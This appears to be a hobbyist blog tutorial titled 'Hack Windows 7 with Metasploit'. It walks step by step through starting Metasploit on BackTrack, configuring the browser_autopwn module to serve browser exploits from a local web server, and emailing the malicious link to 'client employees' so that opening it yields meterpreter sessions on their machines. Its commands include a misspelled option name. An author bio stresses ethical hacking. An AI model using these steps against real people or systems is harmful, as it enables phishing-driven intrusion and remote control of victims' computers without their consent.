Showing posts with label 7. Show all posts
Showing posts with label 7. Show all posts

Hack Windows 7 with Metasploit

What is Metasploit?

Metasploit is a framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, scanners, payloads, modules, auxiliaires, vulnerability assessments etc.
Requirements:-
 VULNERABILITY
 EXPLOIT
 PAYLOAD
Vulnerability is a weakness or hole of the system through which an attacker enters into the machine.
Exploit is a program or code which takes the advantage of the vulnerability to break the security of system.
Payload is a program which gives control of the system.
Step 1 –
Power on your Backtrack Operating System with
Username=root and Password=toor (By Default)
After login to this, Type “startx” for entering into GUI Mode.
Step 2 –
Now For Hacking Windows, You have to Start Metasploit Framework.
So Open your terminal and type this command,

root@bt:~# msfconsole






 Step 3 –
Now For hacking windows 7, we use this exploit named as browser Autopwn
root@bt:~# use auxiliary/server/browser_autopwn
The basic idea behind this module is that it creates a web server in our local machine which will contain different kind of browser exploits.
When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.







Step 4 –
Now Type “show options” to check all options related to this exploit




Step 5 –
Now Set your local host IP by typing this command,
root@bt:~# set LHSOT 192.168.17.133



To set Port, type this command,
root@bt:~# set SRVPORT 80


In order to prevent Metasploit to set up random URL’s, we use URIPATH
root@bt:~# set URIPATH /


Step 6 –
Now type “exploits” command
After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.




Now we can share the link through our email to our client employees.
Step 7 –
If any user opens the malicious link, the Autopwn module will try all these exploits in order to see if it can break into the client.
If the browser is vulnerable to any of these exploits meterpreter sessions will open.
To check all sessions, type this command,
root@bt:~# sessions -i


Step 8 –
To Open First Session, type this command
root@bt:~# sessions –i 1

Amit Vijayan

Amit Vijayan
Hack Ethically

About Me


I am an engineering student and i am very dedicated about Ethical Hacking. I have been learning "Ethical Hacking" for about 4 years now.
Though I'am not a pro hacker but also not a noob. I have enough knowledge to give others like me, a start for their Ethical Hacking & Cyber Security. As i keep learning new things, i keep updating them on the blog from basic to advanced level.
I started Ethical Hacking as a hobby which has now turned into my passion and i'am sure i will turn it into my profession through this blog.

Always be an Ethical Hacker.